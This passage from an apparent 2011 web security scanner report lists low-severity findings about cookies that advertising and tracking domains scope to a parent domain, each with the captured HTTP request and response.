The following cookies were issued by the application and is scoped to a parent of the issuing domain:

V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Wed, 29-Aug-2012 00:56:36 GMT; Path=/
pb_rtb_ev="1:535461.2925993182975414771.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Mon, 03-Sep-2012 00:56:36 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=535461&ev=2925993182975414771 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app603
Cache-Control: no-cache, no-store
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Wed, 29-Aug-2012 00:56:36 GMT; Path=/
Set-Cookie: pb_rtb_ev="1:535461.2925993182975414771.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Mon, 03-Sep-2012 00:56:36 GMT; Path=/
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:56:36 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

11.14. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.casalemedia.com
Path:	/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:48:11 GMT
CMS=65131&1314825471&95308&1314825468&102679&1315097055;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 00:48:11 GMT
CMST=TmLJ305iyssE;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 00:48:11 GMT
CMD1=AAFehU5iyssAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 00:48:11 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025 HTTP/1.1
Host: c.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSC=TmLJ3w**; CMDD=AAF1owE*; CMIMP=102679&1315097282; CMRUM2=04000000002925993182975414771; CMST=TmLJ305iyskD; CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMS=65131&1314825471&95308&1314825468&102679&1315097055; CMD1=AAFehU5iyskAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Location: http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025
Content-Length: 253
Content-Type: text/html; charset=iso-8859-1
Expires: Sun, 04 Sep 2011 00:48:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:48:11 GMT
Connection: close
Set-Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:48:11 GMT
Set-Cookie: CMPS=179;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:48:11 GMT
Set-Cookie: CMPP=016;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:48:11 GMT
Set-Cookie: CMS=65131&1314825471&95308&1314825468&102679&1315097055;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 00:48:11 GMT
Set-Cookie: CMST=TmLJ305iyssE;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 00:48:11 GMT
Set-Cookie: CMD1=AAFehU5iyssAAZEXAAOXuwEBAQABK4NOXqT-AAD+awAC-OsBAQAAAUxxTl6k-AABdEwAA0OMAQEA;domain=casalemedia.com;path=/;expires=Tue, 04 Oct 2011 00:48:11 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/ck/10105-135615
...[SNIP]...

11.15. http://ce.lijit.com/merge previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ce.lijit.com
Path:	/merge

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D; expires=Mon, 03-Sep-2012 00:58:08 GMT; path=/; domain=.lijit.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /merge?pid=1&3pid=2925993182975414771 HTTP/1.1
Host: ce.lijit.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:58:08 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n15 ( lax-agg-n48), ms lax-agg-n48 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
Pragma: no-cache
Expires: Mon, 05 Sep 2011 00:58:08 GMT
Content-Length: 43
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: ljtrtb=eJyrVjJUslIysjQytbQ0NrQwsjQ3NTE0MTc3VKoFAFC9Bds%3D; expires=Mon, 03-Sep-2012 00:58:08 GMT; path=/; domain=.lijit.com

GIF89a.............!.......,...........D..;

11.16. http://cm.npc-mcclatchy.overture.com/js_1_0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.npc-mcclatchy.overture.com
Path:	/js_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyM3QzdTZwMAR/lMxQw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:03:14 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=1001507650&type=news&ctxtId=news&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop&ctxtCat=news&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097337736&ctxtContent=%3Chead%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.publish2.com%2Fnewsgroups%2Fstate-worker.js%3Fjsonp_callback%3DjQuery15205311797398608178_1315097321812%26amp%3B_%3D1315097336789%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fapi.twitter.com%2F1%2Fstatuses%2Fuser_timeline.json%3Fscreen_name%3DTheStateWorker%26amp%3Bcallback%3DjQuery15205311797398608178_1315097321811%26amp%3B_%3D1315097336786%22%3E%3C%2Fscript%3E%0A%20%20%20%20%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.scribd.com%2Fjavascripts%2Fembed_code%2Finject.js%22%3E%3C%2Fscript%3E%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%20%20 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxNTZ0MAZ7BMtQw=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyM3QzdTZwMAR/lMxQw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:03:14 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 814

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

11.17. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2925993182975414771 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/dm/mkt/44/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=7261694771272195332; Domain=.audienceiq.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/44/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=7261694771272195332; Domain=.audienceiq.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

11.18. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2925993182975414771 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/dm/mkt/73/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=2966958661410417168; Domain=.audienceiq.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/73/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2966958661410417168; Domain=.audienceiq.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

11.19. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2925993182975414771 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.mediabrandsww.com
Path:	/r/dm/mkt/3/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=2644337228958821130; Domain=.mediabrandsww.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/3/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.mediabrandsww.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2644337228958821130; Domain=.mediabrandsww.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

11.20. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2925993182975414771 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.p-td.com
Path:	/r/dm/mkt/4/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=4018048898892878422; Domain=.p-td.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/2925993182975414771 HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4018048898892878422

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4018048898892878422; Domain=.p-td.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

11.21. http://i.casalemedia.com/imp.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.casalemedia.com
Path:	/imp.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:53:06 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp.gif?c=89733&cr=235451 HTTP/1.1
Host: i.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMS=102679&1315097055; CMST=TmLJ305iyd8B; CMSC=TmLJ3w**; CMDD=AAF1owE*; CMD1=AAFehU5iyd8AAZEXAAOXuwEBAA**

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 00:53:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:53:06 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:53:06 GMT
Set-Cookie: CMPS=179;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:53:06 GMT
Set-Cookie: CMPP=016;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:53:06 GMT

GIF89a.............!.......,...........D..;

11.22. http://ib.adnxs.com/getuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 00:57:20 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=$UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZV2FP?n>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3I*!2a3C06.$K; sess=1; uuid2=6422714091563403120

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 00:57:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 00:57:20 GMT; domain=.adnxs.com; HttpOnly
Location: http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=6422714091563403120
Date: Sun, 04 Sep 2011 00:57:20 GMT
Content-Length: 0

11.23. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PUBRETARGET=78_1409703834.82_1409705283; domain=pubmatic.com; expires=Wed, 03-Sep-2014 00:48:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODImdGw9MTU3NjgwMCZkcF9pZD0yMg==&piggybackCookie=pcv:1|uid:2925993182975414771 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; PUBRETARGET=78_1409703834

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:31 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283; domain=pubmatic.com; expires=Wed, 03-Sep-2014 00:48:03 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html

11.24. http://imp.fetchback.com/serve/fb/adtag.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=1_1315097673_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:33 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; uid=1_1315097051_1314893682667:5756480826433243; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:33 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097673_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:33 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:54:33 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 295

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=' width='300' heigh
...[SNIP]...

11.25. http://imp.fetchback.com/serve/fb/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cre=1_1315097700_34021:68285:2:0:415_34024:68283:2:649:741_34024:68292:2:119537:119619_34023:68293:1:120250:120250; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
uid=1_1315097700_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
kwd=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
scg=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
ppd=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
act=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051; uid=1_1315097284_1314893682667:5756480826433243

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:00 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: cre=1_1315097700_34021:68285:2:0:415_34024:68283:2:649:741_34024:68292:2:119537:119619_34023:68293:1:120250:120250; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: uid=1_1315097700_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: kwd=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
